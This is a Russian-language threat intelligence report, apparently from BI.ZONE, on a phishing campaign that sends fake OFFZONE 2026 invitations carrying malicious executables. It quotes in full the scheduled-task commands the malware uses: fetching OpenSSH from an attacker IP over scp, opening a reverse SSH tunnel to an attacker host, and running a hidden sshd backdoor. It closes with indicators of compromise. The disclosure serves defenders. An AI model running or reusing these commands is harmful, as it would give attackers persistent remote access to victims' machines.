🔺 Фишинговая рассылка с приглашением принять участие в OFFZONE 2026 — 25 июня 2026 г. в 10:58:00.721
🔺 Фишинговая рассылка с приглашением принять участие в OFFZONE 2026 Недавно нам поступила информация, что от имени BI.ZОNE рассылаются письма с приглашением принять участие в конференции. Специалисты BI.ZONE Threat Intelligence оперативно проанализировали рассылку. Делимся подробностями: Вложения к фишинговому письму и файлы из архива • Отвлекающий документ OFFZONE_2026_Приглашение.pdf. • Защищенный паролем архив ОFFZONE_2026_Информация_и_гостевые_приглашения.ziр (пароль: OFFZONE2026!Guest) с двумя вредоносными исполняемыми файлами: OFFZONE_2026_Гостевое_приглашение_для_представителей_компаний.exe, OFFZONE_2026_О_мероприятии_и_возможностях_для_компаний.exe. Эти вредоносные файлы имеют одинаковую функциональность и используются для установки в целевой системе программного обеспечения OpenSSH с целью организации канала удаленного доступа для злоумышленников. Все действия ВПО осуществляет через запланированные задачи, при этом в каждой задаче присутствует запуск исполняемого файла DeviceCredentialDeployment.exe, используемого для сокрытия окна консоли. Как работает ВПО 1️⃣ Создание файла закрытого ключа OpenSSH по пути %AppData%\Microsoft\CAKey, используемого в дальнейшем для загрузки дополнительных файлов в скомпрометированную систему. 2️⃣ Создание запланированной задачи для загрузки архива с OpenSSH: schtasks /Create /TN "MicrosoftEdgeUpdateTaskUser" /TR "cmd.exe /c DeviceCredentialDeployment.exe & scp -o StrictHostKeyChecking=no -i %AppData%\Microsoft\CAKey -P 333 root@46.17.40[.]11:/root/OpenSSH.ziр %AppData%\OpenSSH.zip" /SC hourly /mo 3 /ST [current_time] /F Загрузка архива осуществляется с использованием штатной утилиты scp с ранее созданного закрытого ключа OpenSSH с сетевого ресурса 46.17.40[.]11. Архив ОpenSSH.ziр сохраняется в каталог %AppData%. Эта задача запускается каждые 3 часа, начиная с текущего времени. 3️⃣ Создание запланированной задачи для распаковки загруженного архива: schtasks /Create /TN "MicrosoftEdgeUpdateTaskUserDev" /TR "cmd.exe /c DeviceCredentialDeployment.exe & powershell.exe Expand-Archive -Path %AppData%\OpenSSH.ziр -DestinationPath %AppData%" /SC hourly /mo 3 /ST [current_time + 3 min] /F 4️⃣ Создание запланированной задачи для подключения к управляющему серверу по протоколу SSH: schtasks /Create /TN "UpdateBUS" /TR "cmd.exe /c DeviceCredentialDeployment.exe & %AppData%\OpenSSH\ssh.exe -i %AppData%\OpenSSH\new_key_rsa feu4jfo84f4o@microservices.casacam[.]net -R 127.0.0.1:53626:127.0.0.1:53262 -o StrictHostKeyChecking=no -p 53262" /SC hourly /mo 3 /ST [current_time + 6 min] /F Для подключения к серверу атакующих используется закрытый ключ new_key_rsa из распакованного архива. Создается обратный SSH-туннель, позволяющий атакующим получать доступ к сервису, прослушивающему порт 53262 в скомпрометированной системе. 5️⃣ Создание запланированной задачи для запуска сервера OpenSSH: schtasks /Create /TN "MicrosoftEdgeUpdateTaskKernel" /TR "cmd.exe /c DeviceCredentialDeployment.exe & %AppData%\OpenSSH\sshd.exe -f %AppData%\OpenSSH\g -h %AppData%\OpenSSH\r -o AuthorizedKeysFile=%AppData%\OpenSSH\a" /SC hourly /mo 3 /ST [current_time + 6 min] /F 6️⃣ Для отвлечения внимания пользователя осуществляется открытие PDF-документа через explorer.exe. Документ открывается по ссылке hxxp://kazаnsky.cаmdvr[.]org/[index]-2026-06-22-9320045808.pdf?r=[username]&t=[targetname] Индикаторы компрометации: 0b41b33186a9bd84b591666c7a51ca290a5ee931460f3bb8627e98086bc94462 95247787e01accedc63e6d90e883c3b6b0c76341dce13713bef68b00bbc18748 48904b119c6f217fe673d6072e211b5999173c36a4c755de2baa29f1bbe69367 42b8543bc2613fd8eed2b81baec397936459b87d88d1d3faa277eb0b2ec56684 46.17.40[.]11:333 5.252.176[.]5 microservices.casacam[.]net kazansky.camdvr[.]org hxxp://kazansky.cаmdvr[.]org/1-2026-06-22-9320045808.pdf hxxp://kazansky.cаmdvr[.]org/2-2026-06-22-9320045808.pdf promkonf@mail[.]ru promkonf@mail[.]ru

